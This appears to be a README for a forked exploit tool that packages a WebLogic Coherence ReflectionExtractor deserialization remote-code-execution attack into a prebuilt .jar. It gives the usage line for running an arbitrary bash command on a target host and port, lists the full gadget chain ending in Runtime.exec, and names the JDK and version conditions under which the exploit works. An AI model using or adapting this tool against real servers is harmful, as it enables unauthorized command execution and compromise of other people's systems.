Forked from Y4er
I added some changes so the code can be built into a simple .jar with simple arguments (host, port, command, http/s), to build please replace coherence.jar with the version according to your target.
The .jar present in Releases is built for 12.1.3, as is easy to guess.
java -jar 12_1_3.jar -H [Host] -P [Port] -C [Command] -https [optional]
The command is executed with "/bin/bash -c". If another command is needed this can be changed at line 87.
Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE
* gadget:
* BadAttributeValueExpException.readObject()
* com.tangosol.util.filter.LimitFilter.toString()
* com.tangosol.util.extractor.ChainedExtractor.extract()
* com.tangosol.util.extractor.ReflectionExtractor.extract()
* Method.invoke()
* ...
* Runtime.getRuntime.exec()
This only works in JDK 8u76 and WITHOUT a security manager, because of BadAttributeValueExpException
in here:
And Please replace coherence.jar
with your weblogic version, if not, you will get serialVersionUID inconsistent error.
Only test on Centos jdk8u202 Weblogic